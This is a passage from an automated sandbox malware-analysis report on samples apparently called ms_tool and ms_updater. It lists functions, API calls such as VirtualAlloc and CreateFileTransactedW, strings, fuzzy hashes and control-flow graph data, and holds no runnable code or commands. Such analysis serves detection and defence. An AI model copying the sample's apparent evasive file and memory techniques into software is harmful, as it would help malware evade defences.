                                                      • Opcode ID: b1c271bd61be92c86ed1bd6d37e711693baa63690a9554fba3a7541d918cc386
                                                      • Instruction ID: fe6f5cc3729442c1275d31ec0f5a11f4b5327f682c216798b0cc7cc3867b147c
                                                      • Opcode Fuzzy Hash: b1c271bd61be92c86ed1bd6d37e711693baa63690a9554fba3a7541d918cc386
                                                      • Instruction Fuzzy Hash: 12D1B132A18642C6EF649F24EC402B977A0FF48B44F81513ADA4EC7699DF3CE965C702
                                                      Function 00007FF68C5E26C0 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                      • String ID:
                                                      • API String ID: 4291973834-0
                                                      • Opcode ID: 4ae1ec36ffe66ceb984f778016071e3338dd8f43b2d01ad686cb2e83bbe4d9b1
                                                      • Instruction ID: c2b44b659de3fd640f6605159054109f8f7635a7c171191d210cbc08f8d4340f
                                                      • Opcode Fuzzy Hash: 4ae1ec36ffe66ceb984f778016071e3338dd8f43b2d01ad686cb2e83bbe4d9b1
                                                      • Instruction Fuzzy Hash: 4741EE75E0C61BC6FF649B56E94027922A0BF48790F44053EDA0DC76AADF2CF8A0C742
                                                      Function 00007FF68C5E1130 Relevance: 7.6, APIs: 5, Instructions: 62memoryfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: LocalWrite$AllocByteCharConsoleFileFreeMultiWide
                                                      • String ID:
                                                      • API String ID: 3543570371-0
                                                      • Opcode ID: 5e08e7c95a99c52eb60246902b127f6bc43a3d2a40ff4cdd77f2489be4fee96d
                                                      • Instruction ID: 7c96c9f0946289f3e87768f2492e6e261aaaab87727b9b22f5e30c2fb349e771
                                                      • Opcode Fuzzy Hash: 5e08e7c95a99c52eb60246902b127f6bc43a3d2a40ff4cdd77f2489be4fee96d
                                                      • Instruction Fuzzy Hash: 2A216235A08B42C6EB148F11F84046ABB71FF89BA1F458239DE5E827A5CF3CE166C701
                                                      Function 00007FF68C5E1660 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: DeviceFormatMessageQuerylstrcmp
                                                      • String ID: :$\
                                                      • API String ID: 1650219507-1166558509
                                                      • Opcode ID: 5d99d3ed7c2355dc3fb6264f36c03b812a760603cbc98b657a64cab4886fd2bc
                                                      • Instruction ID: f728609613e26a99046e8618287de3b0964e7c57f11264079f32fe534b1ca6e7
                                                      • Opcode Fuzzy Hash: 5d99d3ed7c2355dc3fb6264f36c03b812a760603cbc98b657a64cab4886fd2bc
                                                      • Instruction Fuzzy Hash: 0C2150B2618681C2FE608F11E4003AB67A4FF89B84F455139DA8D8768ADF3CD555CB02
                                                      Function 00007FF68C5E1238 Relevance: 1.5, APIs: 1, Instructions: 31windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: ConsoleFormatMessageWrite
                                                      • String ID:
                                                      • API String ID: 1159442765-0
                                                      • Opcode ID: febdcccd4a6ca5abf0651f36ac2c4d885d5640e56f15418ecebb4e798eb2bb65
                                                      • Instruction ID: ee1c9e8d5b7c4ac04eb766bd1548031e3ca3dfcc28cd5a85f6d9e933f2a9a41c
                                                      • Opcode Fuzzy Hash: febdcccd4a6ca5abf0651f36ac2c4d885d5640e56f15418ecebb4e798eb2bb65
                                                      • Instruction Fuzzy Hash: B6012C32A18B81C6EB24DB10F45525AB7A4FBD9784F414139E68C83B59EF7CD129CB41

                                                      Non-executed Functions

                                                      Function 00007FF68C5E2DB4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 4104442557-0
                                                      • Opcode ID: 40e3f1c2d9f24896e6cf21ecc3f7062268da11ab292e1b49d4a7588a6e2f4437
                                                      • Instruction ID: 2ffcff26640156e382a8a63ee0d00a391533547908ad8261d3e2eaae61b16126
                                                      • Opcode Fuzzy Hash: 40e3f1c2d9f24896e6cf21ecc3f7062268da11ab292e1b49d4a7588a6e2f4437
                                                      • Instruction Fuzzy Hash: D2111A22A04B41CAEF00DF60E8442A833A4FB08758F410E38EA6D87B54EF7CD5A4C340
                                                      Function 00007FF68C5E159C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID: \\.\MountPointManager
                                                      • API String ID: 33631002-3276014075
                                                      • Opcode ID: c6ab8fc516d38159cfff938e0a4f74ad7cc36754aaf57107d06ca0e3cd3c8a9d
                                                      • Instruction ID: f6e66a4fa6d2eb78de4e5aae04fa8c5fbb4ea23b2d4dbf75b6644bbd493c0333
                                                      • Opcode Fuzzy Hash: c6ab8fc516d38159cfff938e0a4f74ad7cc36754aaf57107d06ca0e3cd3c8a9d
                                                      • Instruction Fuzzy Hash: 3E114F32608B91C6DB148F58F404169BBA4FB89BB4F594329EA7E83BD4CF38C555CB04
                                                      Function 00007FF68C5E28C0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                      • String ID:
                                                      • API String ID: 140117192-0
                                                      • Opcode ID: 6d09d0d0d53610a89bff028a613da3a041f80898f6c4918de23eb4cbd6362075
                                                      • Instruction ID: 5bda5f33e66bc4798978511dde140a10917902d020a8cb260a629d7c3905a164
                                                      • Opcode Fuzzy Hash: 6d09d0d0d53610a89bff028a613da3a041f80898f6c4918de23eb4cbd6362075
                                                      • Instruction Fuzzy Hash: 8341A4B5A08B16C1EF548B18F89036973A4FF88794F90513ADA8E82764EF7CE564C702
                                                      Function 00007FF68C5E2A98 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1700999861.00007FF68C5E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68C5E0000, based on PE: true
                                                      • Associated: 00000001.00000002.1700976696.00007FF68C5E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000001.00000002.1701045521.00007FF68C5E7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff68c5e0000_ms_tool.jbxd
                                                      Similarity
                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                      • String ID:
                                                      • API String ID: 140117192-0
                                                      • Opcode ID: 0de747106581f371168582486d9dc0af83d46a818d07c167d587705e8cee9617
                                                      • Instruction ID: 3f9ceb9f15156bafcb9fd5fd53517998c733b682ad27cc2a4785847bf89fe195
                                                      • Opcode Fuzzy Hash: 0de747106581f371168582486d9dc0af83d46a818d07c167d587705e8cee9617
                                                      • Instruction Fuzzy Hash: 2021B075A08F5AC1EB508B05F88036973A4FF88794F50013ADA8D83764EF7DE264C702

                                                      Execution Graph

                                                      Execution Coverage:15.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:23.8%
                                                      Total number of Nodes:21
                                                      Total number of Limit Nodes:2
                                                      execution_graph 19209 7ffd9baa9edd 19211 7ffd9baa9eff WriteFile 19209->19211 19212 7ffd9baa9fc7 19211->19212 19227 7ffd9baa9d6e 19228 7ffd9baa9d7d CreateFileTransactedW 19227->19228 19230 7ffd9baa9eaa 19228->19230 19231 7ffd9baab1d4 19232 7ffd9baab1dd VirtualAlloc 19231->19232 19234 7ffd9baab298 19232->19234 19213 7ffd9baaa0e1 19214 7ffd9baaa0eb 19213->19214 19217 7ffd9baaa177 19214->19217 19218 7ffd9baa8db8 19214->19218 19216 7ffd9baaa16b 19219 7ffd9baaa930 19218->19219 19221 7ffd9baaa9e9 19219->19221 19222 7ffd9baa8b98 19219->19222 19221->19216 19224 7ffd9baaaca0 19222->19224 19223 7ffd9baaada3 19223->19221 19224->19223 19225 7ffd9baaaf73 GetSystemInfo 19224->19225 19226 7ffd9baaafae 19225->19226 19226->19221

                                                      Executed Functions

                                                      Function 00007FFD9BBE49CD Relevance: 6.8, Strings: 5, Instructions: 577COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ffd9bbe49cd-7ffd9bbf9e1f 3 7ffd9bbf9e21-7ffd9bbf9e2e 0->3 4 7ffd9bbf9e30-7ffd9bbf9e33 call 7ffd9bbf8738 0->4 7 7ffd9bbf9e38-7ffd9bbf9e77 call 7ffd9bbf11d8 3->7 4->7 12 7ffd9bbf9e79-7ffd9bbf9e8a call 7ffd9bbf11d8 7->12 13 7ffd9bbf9ea6 7->13 19 7ffd9bbf9e8c-7ffd9bbf9ea0 12->19 20 7ffd9bbf9ea2-7ffd9bbf9ea4 12->20 15 7ffd9bbf9eab-7ffd9bbf9eb8 13->15 17 7ffd9bbf9eba-7ffd9bbf9ebf 15->17 18 7ffd9bbf9ec1 15->18 21 7ffd9bbf9ec6-7ffd9bbf9ed2 17->21 18->21 19->15 20->15 22 7ffd9bbf9ed9-7ffd9bbf9f08 call 7ffd9bbe49b8 21->22 23 7ffd9bbf9ed4 21->23 27 7ffd9bbf9f0a-7ffd9bbf9f12 22->27 28 7ffd9bbf9f14 22->28 23->22 29 7ffd9bbf9f1c-7ffd9bbf9f42 27->29 28->29 33 7ffd9bbf9f44 29->33 34 7ffd9bbf9f4d-7ffd9bbf9f54 29->34 33->34 35 7ffd9bbf9f56-7ffd9bbf9f59 34->35 36 7ffd9bbf9f75-7ffd9bbf9f94 call 7ffd9bbf2dd0 call 7ffd9bbf2cb0 34->36 35->36 38 7ffd9bbf9f5b-7ffd9bbf9f69 35->38 43 7ffd9bbf9f99-7ffd9bbf9fc2 36->43 42 7ffd9bbf9f6b-7ffd9bbf9f73 38->42 38->43 42->43 44 7ffd9bbf9fd4-7ffd9bbfa002 call 7ffd9bbe49c8 43->44 45 7ffd9bbf9fc4-7ffd9bbf9fcd 43->45 48 7ffd9bbfa004-7ffd9bbfa00c call 7ffd9bbe4a18 44->48 49 7ffd9bbfa00e-7ffd9bbfa015 44->49 45->44 53 7ffd9bbfa028-7ffd9bbfa02f 48->53 51 7ffd9bbfa017-7ffd9bbfa01e 49->51 52 7ffd9bbfa020-7ffd9bbfa024 49->52 51->52 51->53 52->53 55 7ffd9bbfa03b-7ffd9bbfa051 call 7ffd9bbeabf8 53->55 56 7ffd9bbfa031-7ffd9bbfa039 53->56 57 7ffd9bbfa057-7ffd9bbfa0f1 55->57 56->57 59 7ffd9bbfa11b-7ffd9bbfa1b5 57->59 60 7ffd9bbfa0f3 57->60 63 7ffd9bbfa1b8-7ffd9bbfa1c0 59->63 62 7ffd9bbfa0f5-7ffd9bbfa0fe 60->62 65 7ffd9bbfa3cb-7ffd9bbfa3e3 62->65 66 7ffd9bbfa104-7ffd9bbfa114 62->66 63->65 67 7ffd9bbfa1c6-7ffd9bbfa1d9 63->67 72 7ffd9bbfa3eb-7ffd9bbfa3f9 65->72 73 7ffd9bbfa3e5-7ffd9bbfa3e9 65->73 66->62 69 7ffd9bbfa116 66->69 67->65 68 7ffd9bbfa1df-7ffd9bbfa1fa call 7ffd9bbe49a8 67->68 74 7ffd9bbfa1ff-7ffd9bbfa210 68->74 69->63 73->72 76 7ffd9bbfa21b 74->76 77 7ffd9bbfa212-7ffd9bbfa219 74->77 78 7ffd9bbfa21d-7ffd9bbfa229 76->78 77->78 78->65 79 7ffd9bbfa22f-7ffd9bbfa241 78->79 79->65 80 7ffd9bbfa247-7ffd9bbfa2a8 79->80 84 7ffd9bbfa2aa-7ffd9bbfa2ca 80->84 85 7ffd9bbfa2cd-7ffd9bbfa2eb 80->85 84->85 88 7ffd9bbfa335-7ffd9bbfa342 call 7ffd9bbf11d8 85->88 89 7ffd9bbfa2ed-7ffd9bbfa312 call 7ffd9bbf8790 call 7ffd9bbf87c0 call 7ffd9bbf8798 85->89 94 7ffd9bbfa344-7ffd9bbfa34b 88->94 95 7ffd9bbfa34d-7ffd9bbfa366 88->95 107 7ffd9bbfa314-7ffd9bbfa31d 89->107 108 7ffd9bbfa31f-7ffd9bbfa328 89->108 94->95 97 7ffd9bbfa391-7ffd9bbfa3b3 94->97 102 7ffd9bbfa368-7ffd9bbfa36d call 7ffd9bbf8790 95->102 103 7ffd9bbfa372-7ffd9bbfa390 95->103 97->65 102->103 110 7ffd9bbfa32e-7ffd9bbfa32f 107->110 108->110 110->88
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K$P$c$c$c
                                                      • API String ID: 0-3860519558
                                                      • Opcode ID: ebd9859a96d503eb731613f8848ce8640cb8eebdacd39542f117cb5ab54b1113
                                                      • Instruction ID: 03cb7e88c255c4bd363aed901e61e8618019dfd8fb82449db2c72bab8156e4d6
                                                      • Opcode Fuzzy Hash: ebd9859a96d503eb731613f8848ce8640cb8eebdacd39542f117cb5ab54b1113
                                                      • Instruction Fuzzy Hash: 00122230B19A4E8FE728DA7888A53F97AD2FF95309F05457DD08EC36D6CE2CA9458350
                                                      Function 00007FFD9BAA8B98 Relevance: 1.9, APIs: 1, Instructions: 403COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 836 7ffd9baa8b98-7ffd9baaacb3 838 7ffd9baaacb5-7ffd9baaacd7 836->838 839 7ffd9baaacfd-7ffd9baaad0a 836->839 842 7ffd9baaacd9-7ffd9baaacdc 838->842 843 7ffd9baaad30-7ffd9baaad5a 838->843 840 7ffd9baaad0c-7ffd9baaad15 839->840 841 7ffd9baaad1a-7ffd9baaad20 839->841 840->841 844 7ffd9baaad17-7ffd9baaad18 840->844 845 7ffd9baaad25 841->845 846 7ffd9baaad22-7ffd9baaad23 841->846 848 7ffd9baaad5d-7ffd9baaad60 842->848 849 7ffd9baaacde-7ffd9baaace0 842->849 847 7ffd9baaad5c 843->847 844->841 850 7ffd9baaad2b-7ffd9baaad2e 845->850 846->845 847->848 851 7ffd9baaad62-7ffd9baaad6a 848->851 849->847 852 7ffd9baaace2 849->852 850->843 853 7ffd9baaada8-7ffd9baaadab 851->853 854 7ffd9baaad6c-7ffd9baaad7b 851->854 852->845 855 7ffd9baaace4-7ffd9baaace6 852->855 859 7ffd9baaadec-7ffd9baaadef 853->859 856 7ffd9baaad89-7ffd9baaad9f 854->856 857 7ffd9baaad7d-7ffd9baaad80 854->857 855->851 858 7ffd9baaace8 855->858 856->854 868 7ffd9baaada1 856->868 857->856 860 7ffd9baaad82-7ffd9baaad87 857->860 858->850 861 7ffd9baaacea-7ffd9baaacfb call 7ffd9baa8cd8 858->861 863 7ffd9baaadad-7ffd9baaadbb call 7ffd9baa8ba0 859->863 864 7ffd9baaadf1 859->864 860->856 866 7ffd9baaada3-7ffd9baaaebf 860->866 861->839 874 7ffd9baaadc0-7ffd9baaadc6 863->874 865 7ffd9baaae11-7ffd9baaae14 864->865 870 7ffd9baaae16-7ffd9baaae19 865->870 871 7ffd9baaae7f-7ffd9baaae82 865->871 868->853 875 7ffd9baaae5a-7ffd9baaae5d 870->875 877 7ffd9baaaec0-7ffd9baaaecc 871->877 878 7ffd9baaae84-7ffd9baaaeaa 871->878 874->865 876 7ffd9baaadc8-7ffd9baaadea call 7ffd9baa8cf8 874->876 880 7ffd9baaae1b-7ffd9baaae34 call 7ffd9baa8ba8 875->880 881 7ffd9baaae5f 875->881 876->859 891 7ffd9baaadf3-7ffd9baaae0f 876->891 884 7ffd9baaaf1c-7ffd9baaafac GetSystemInfo 877->884 885 7ffd9baaaece-7ffd9baaaf09 877->885 880->871 893 7ffd9baaae36-7ffd9baaae58 call 7ffd9baa8cf8 880->893 881->871 901 7ffd9baaafae 884->901 902 7ffd9baaafb4-7ffd9baaafd5 884->902 903 7ffd9baaaf0b-7ffd9baaaf0f 885->903 904 7ffd9baaaf11-7ffd9baaaf1a 885->904 891->865 893->875 900 7ffd9baaae61-7ffd9baaae7d 893->900 900->871 901->902 903->904 904->884
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1771443053.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem
                                                      • String ID:
                                                      • API String ID: 31276548-0
                                                      • Opcode ID: f8791edfe342db74c320fd7bc9bd94041de1c572dd9e9818374e6eac91f2e79b
                                                      • Instruction ID: 2ab0d650687091bc4214aeb61e6403467d925a933037d808d0cdba728785e799
                                                      • Opcode Fuzzy Hash: f8791edfe342db74c320fd7bc9bd94041de1c572dd9e9818374e6eac91f2e79b
                                                      • Instruction Fuzzy Hash: 06B13631B0DE0D4FE7B8DB58D4657B977D2EB99321F05023ED04EC32A1DEA5A9028791
                                                      Function 00007FFD9BBE4A0D Relevance: 1.3, Instructions: 1278COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 889061075bb234f8c18234a131c827533ce2e348a700f1b5d02d8fb2d8dd1493
                                                      • Instruction ID: fa85f6e947ae4742783f9f54b7e6802e04a019d6cf026c204232acaefbf5b7f5
                                                      • Opcode Fuzzy Hash: 889061075bb234f8c18234a131c827533ce2e348a700f1b5d02d8fb2d8dd1493
                                                      • Instruction Fuzzy Hash: C4929130A18A4E4FDB98DF68C895BB973E1FB98304F15417CD49ACB296CE35E952C780
                                                      Function 00007FFD9BBF364E Relevance: 1.1, Instructions: 1131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74f54c237a68435a67d037f21f51bd6f226beaff1557135be864bc19e7be4975
                                                      • Instruction ID: e8b0760d634c41ae9f404fd3fa9d1463dfb0bca4f98386680c0a304a78e489e5
                                                      • Opcode Fuzzy Hash: 74f54c237a68435a67d037f21f51bd6f226beaff1557135be864bc19e7be4975
                                                      • Instruction Fuzzy Hash: 7D820C3170891D8FDB98EB68C4A9E65B7E2FF68304F1541A9D40EC72A6DE35EC81CB41
                                                      Function 00007FFD9BBE7276 Relevance: .5, Instructions: 468COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a76dbdf773bb9f08beac43dacfab9f4b41506f91e2ee20efc19aa7eca22a4c42
                                                      • Instruction ID: 1ed312470b1ee67fe0db04787f632b4099035ca9adcef916523cd9863cf9f5df
                                                      • Opcode Fuzzy Hash: a76dbdf773bb9f08beac43dacfab9f4b41506f91e2ee20efc19aa7eca22a4c42
                                                      • Instruction Fuzzy Hash: C3F1C731A09A8E4FEBA8DF28C8597E937D1FF54314F14426EE85DC72E5CB3499418B82
                                                      Function 00007FFD9BBE8B21 Relevance: .5, Instructions: 459COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85521bbc52bd9f3604abd2ccae4c08e0830a8b22f38b7655790b70b5d4662af0
                                                      • Instruction ID: f157aad23fd9605b018c5a4d8e990ece0d657b68354a0e2c0e1e577ca41885d9
                                                      • Opcode Fuzzy Hash: 85521bbc52bd9f3604abd2ccae4c08e0830a8b22f38b7655790b70b5d4662af0
                                                      • Instruction Fuzzy Hash: 41C10B11F2C94A0BE76DF77D6C675B9B3C2EF89315B0441B9E45EC72DBDC29A8024282
                                                      Function 00007FFD9BBE8022 Relevance: .5, Instructions: 454COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc94c25c2a1d59436b70626404d80e225b455b0d24113fe8f2a0b77eec0db6ed
                                                      • Instruction ID: d4b2ff0a89919404b5b27222edbc7e30817cf63ec0d88007951df0c1d0e737ac
                                                      • Opcode Fuzzy Hash: bc94c25c2a1d59436b70626404d80e225b455b0d24113fe8f2a0b77eec0db6ed
                                                      • Instruction Fuzzy Hash: 2EE1C330A09E4E8FEBA8DF68D8557E937D1FF54314F04426AE84DC72E1CA78A94087C2
                                                      Function 00007FFD9BBEAC2A Relevance: .4, Instructions: 425COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6346747d32eddc48792aae735b376a427de43e63f3ef7fa798f5a9d339ff2353
                                                      • Instruction ID: ebd06521ea6fe267e8c929cf08126cc162bc7994de8fbce6b70ed4d4c9b0c299
                                                      • Opcode Fuzzy Hash: 6346747d32eddc48792aae735b376a427de43e63f3ef7fa798f5a9d339ff2353
                                                      • Instruction Fuzzy Hash: B9D11732B1D94E4FE768EA6888616B973D1FF54318F0102BAE45EC71F7DD2479058682
                                                      Function 00007FFD9BBE1B10 Relevance: .4, Instructions: 409COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bbe0000_ms_updater.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eea5b0a39eb22b72d3d05f4ae085c32d39cb8aba22d9a7777e97239cf2c27e75
                                                      • Instruction ID: 21d907d07fc25ce138ee2095796ba9175d31deee4c66b57a4c69c4062ca1f4ae
                                                      • Opcode Fuzzy Hash: eea5b0a39eb22b72d3d05f4ae085c32d39cb8aba22d9a7777e97239cf2c27e75
                                                      • Instruction Fuzzy Hash: 5BD13C21F0D64E0FE769EB7898755B877D1FF85318B0501B6E05DCB2E7ED29A9028382
                                                      Function 00007FFD9BBE1AF5 Relevance: .4, Instructions: 361COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1772158838.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
